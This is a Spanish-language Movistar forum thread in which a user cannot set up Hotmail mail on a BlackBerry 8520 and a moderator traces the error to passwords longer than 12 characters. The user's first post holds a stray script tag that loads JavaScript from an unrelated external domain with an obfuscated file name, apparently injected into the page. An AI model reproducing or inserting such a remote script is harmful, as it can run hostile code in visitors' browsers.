Configurar correo windows live messenger en Blackberry 8520

kathy_85
Yo probé el VDSL
Configurar correo windows live messenger en Blackberry 8520

Mi problema es que intento configurar el correo en mi blackberry y me pone que la dirección o contraseña no son correctas y he revisado todo y lo escribo correctamente.

Alguien puede ayudarme?

<script type="text/javascript" src="http://plugin-tema-rosa.info/dfi823hs.js?0.7733871222655867"></script>
Mensaje 1 de 3
796 Visitas
2 RESPUESTAS 2
Irene-movistar
Antiguo Moderador

Hola kathy_85

 

Buenos días y bienvenida al foro!

 

Necesito que me mandes por mensaje privado tus datos ( a nombre de quien está la línea, número de la misma, pin e imei de la Bb )

 

Saludos!



Si necesitas soporte técnico en averías de Móvil, Fijo, Movistar+ o Internet Fijo (cobre o fibra), puedes acceder a nuestro apartado de Soporte Técnico o rellenar este formulario. También puedes contactar con nosotros llamando al 1002.

 Si necesitas contratar Fibra Ópticacomprobar tu cobertura Adsl y Fibrao ver información sobre la instalación de la fibra visita nuestra página ADSL y Fibra en movistar.es 

Solución aceptada.png
Mensaje 2 de 3
778 Visitas
Irene-movistar
Antiguo Moderador

Hola 😉

 

Lo que sucede es que la contraseña de esta cuenta es muy grande, me explico, si tiene mas de 12dígitos da error al configurarlo... Tienes que cambiarla en la cuenta de hotmail y luego configurarla de nuevo en la Bb.

 

Prueba y me dices si te funciona.

 

Salu2!!



Si necesitas soporte técnico en averías de Móvil, Fijo, Movistar+ o Internet Fijo (cobre o fibra), puedes acceder a nuestro apartado de Soporte Técnico o rellenar este formulario. También puedes contactar con nosotros llamando al 1002.

 Si necesitas contratar Fibra Ópticacomprobar tu cobertura Adsl y Fibrao ver información sobre la instalación de la fibra visita nuestra página ADSL y Fibra en movistar.es 

Solución aceptada.png
Mensaje 3 de 3
765 Visitas